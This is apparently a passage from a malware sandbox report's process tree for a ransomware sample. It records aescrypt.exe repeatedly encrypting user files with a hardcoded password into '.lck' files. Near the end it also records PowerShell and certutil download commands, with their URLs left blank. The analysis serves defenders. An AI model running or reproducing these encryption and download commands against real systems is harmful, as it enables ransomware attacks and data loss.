    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck.lck.lck.lck" "SaveWatch.vsw.lck.lck.lck"
    3⤵
    PID:1552
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck" "ResumeClose.pptx"
    3⤵
    PID:440
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck.lck" "ResumeClose.pptx.lck"
    3⤵
    PID:664
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck.lck.lck" "ResumeClose.pptx.lck.lck"
    3⤵
    PID:1656
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck.lck.lck.lck" "ResumeClose.pptx.lck.lck.lck"
    3⤵
    PID:1540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck" "UninstallGet.xls"
    3⤵
    PID:1928
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck.lck" "UninstallGet.xls.lck"
    3⤵
    PID:1836
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck.lck.lck" "UninstallGet.xls.lck.lck"
    3⤵
    PID:1948
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck.lck.lck.lck" "UninstallGet.xls.lck.lck.lck"
    3⤵
    PID:1256
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck" "MoveComplete.vdx"
    3⤵
    PID:236
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck.lck" "MoveComplete.vdx.lck"
    3⤵
    PID:1564
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck.lck.lck" "MoveComplete.vdx.lck.lck"
    3⤵
    PID:1368
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck.lck.lck.lck" "MoveComplete.vdx.lck.lck.lck"
    3⤵
    PID:1080
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck" "CloseRevoke.xls"
    3⤵
    PID:528
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck.lck" "CloseRevoke.xls.lck"
    3⤵
    PID:968
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck.lck.lck" "CloseRevoke.xls.lck.lck"
    3⤵
    PID:944
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck.lck.lck.lck" "CloseRevoke.xls.lck.lck.lck"
    3⤵
    PID:1696
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck" "ApproveWrite.vsw"
    3⤵
    PID:1952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck.lck" "ApproveWrite.vsw.lck"
    3⤵
    PID:1640
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck.lck.lck" "ApproveWrite.vsw.lck.lck"
    3⤵
    PID:212
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck.lck.lck.lck" "ApproveWrite.vsw.lck.lck.lck"
    3⤵
    PID:972
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck" "SendRedo.pub"
    3⤵
    PID:952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck.lck" "SendRedo.pub.lck"
    3⤵
    PID:1128
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck.lck.lck" "SendRedo.pub.lck.lck"
    3⤵
    PID:1576
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck.lck.lck.lck" "SendRedo.pub.lck.lck.lck"
    3⤵
    PID:1276
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck" "StepConnect.xlt"
    3⤵
    PID:1192
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck.lck" "StepConnect.xlt.lck"
    3⤵
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck.lck.lck" "StepConnect.xlt.lck.lck"
    3⤵
    PID:228
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck.lck.lck.lck" "StepConnect.xlt.lck.lck.lck"
    3⤵
    PID:1720
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck" "EditPop.ppt"
    3⤵
    PID:224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck.lck" "EditPop.ppt.lck"
    3⤵
    PID:1744
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck.lck.lck" "EditPop.ppt.lck.lck"
    3⤵
    PID:1604
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck.lck.lck.lck" "EditPop.ppt.lck.lck.lck"
    3⤵
    PID:1552
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck" "DisableUnlock.ppsm"
    3⤵
    PID:440
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck.lck" "DisableUnlock.ppsm.lck"
    3⤵
    PID:664
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck.lck.lck" "DisableUnlock.ppsm.lck.lck"
    3⤵
    PID:1656
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck.lck.lck.lck" "DisableUnlock.ppsm.lck.lck.lck"
    3⤵
    PID:1540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck" "ReceiveAssert.vstm"
    3⤵
    PID:1928
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck.lck" "ReceiveAssert.vstm.lck"
    3⤵
    PID:1836
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck.lck.lck" "ReceiveAssert.vstm.lck.lck"
    3⤵
    PID:1948
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck.lck.lck.lck" "ReceiveAssert.vstm.lck.lck.lck"
    3⤵
    PID:1256
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck" "ProtectSkip.xls"
    3⤵
    PID:236
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck.lck" "ProtectSkip.xls.lck"
    3⤵
    PID:1564
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck.lck.lck" "ProtectSkip.xls.lck.lck"
    3⤵
    PID:1368
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck.lck.lck.lck" "ProtectSkip.xls.lck.lck.lck"
    3⤵
    PID:1080
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck" "ApproveLimit.vsdx"
    3⤵
    PID:528
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck.lck" "ApproveLimit.vsdx.lck"
    3⤵
    PID:968
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck.lck.lck" "ApproveLimit.vsdx.lck.lck"
    3⤵
    PID:944
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck.lck.lck.lck" "ApproveLimit.vsdx.lck.lck.lck"
    3⤵
    PID:1696
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck" "UnlockOptimize.htm"
    3⤵
    PID:1952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck.lck" "UnlockOptimize.htm.lck"
    3⤵
    PID:1640
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck.lck.lck" "UnlockOptimize.htm.lck.lck"
    3⤵
    PID:212
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck.lck.lck.lck" "UnlockOptimize.htm.lck.lck.lck"
    3⤵
    PID:972
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck" "SearchInstall.odp"
    3⤵
    PID:952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck.lck" "SearchInstall.odp.lck"
    3⤵
    PID:1128
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck.lck.lck" "SearchInstall.odp.lck.lck"
    3⤵
    PID:1576
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck.lck.lck.lck" "SearchInstall.odp.lck.lck.lck"
    3⤵
    PID:1276
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1192
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1656
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1468
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:520
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RepairUndo.shtml.lck" "RepairUndo.shtml"
    3⤵
    PID:960
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DebugReceive.ocx.lck" "DebugReceive.ocx"
    3⤵
    PID:1484
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CopySelect.zip.lck" "CopySelect.zip"
    3⤵
    PID:884
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "AddUnpublish.xhtml.lck" "AddUnpublish.xhtml"
    3⤵
    PID:232
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RedoRepair.mpeg.lck" "RedoRepair.mpeg"
    3⤵
    PID:892
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RevokeUnprotect.xlt.lck" "RevokeUnprotect.xlt"
    3⤵
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MountRead.xltm.lck" "MountRead.xltm"
    3⤵
    PID:208
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DebugUnregister.vsdx.lck" "DebugUnregister.vsdx"
    3⤵
    PID:1476
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendTest.jpg.lck" "SendTest.jpg"
    3⤵
    PID:224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallOut.dotm.lck" "UninstallOut.dotm"
    3⤵
    PID:816
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FormatPush.tif.lck" "FormatPush.tif"
    3⤵
    PID:1616
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchPush.mht.lck" "SwitchPush.mht"
    3⤵
    PID:296
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PushConvert.mp4.lck" "PushConvert.mp4"
    3⤵
    PID:228
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UseInitialize.bat.lck" "UseInitialize.bat"
    3⤵
    PID:1720
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeFormat.mpg.lck" "InvokeFormat.mpg"
    3⤵
    PID:1908
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeFormat.ogg.lck" "ResumeFormat.ogg"
    3⤵
    PID:540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UseUninstall.ttf.lck" "UseUninstall.ttf"
    3⤵
    PID:1540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "BlockEnable.mov.lck" "BlockEnable.mov"
    3⤵
    PID:1256
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeOptimize.xps.lck" "ResumeOptimize.xps"
    3⤵
    PID:1916
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchUnregister.svg.lck" "WatchUnregister.svg"
    3⤵
    PID:2040
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExitUnregister.scf.lck" "ExitUnregister.scf"
    3⤵
    PID:1368
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResetPush.svgz.lck" "ResetPush.svgz"
    3⤵
    PID:876
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EnterJoin.tiff.lck" "EnterJoin.tiff"
    3⤵
    PID:2004
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DenyUndo.pdf.lck" "DenyUndo.pdf"
    3⤵
    PID:1572
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishResume.xht.lck" "PublishResume.xht"
    3⤵
    PID:1160
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MeasureImport.contact.lck" "MeasureImport.contact"
    3⤵
    PID:788
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "GroupDismount.ini.lck" "GroupDismount.ini"
    3⤵
    PID:1948
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CopyRestore.ex_.lck" "CopyRestore.ex_"
    3⤵
    PID:216
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WaitResume.3gp.lck" "WaitResume.3gp"
    3⤵
    PID:1656
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeConfirm.eprtx.lck" "ResumeConfirm.eprtx"
    3⤵
    PID:1952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DebugSync.xlsm.lck" "DebugSync.xlsm"
    3⤵
    PID:760
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SetSync.hta.lck" "SetSync.hta"
    3⤵
    PID:944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:1224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
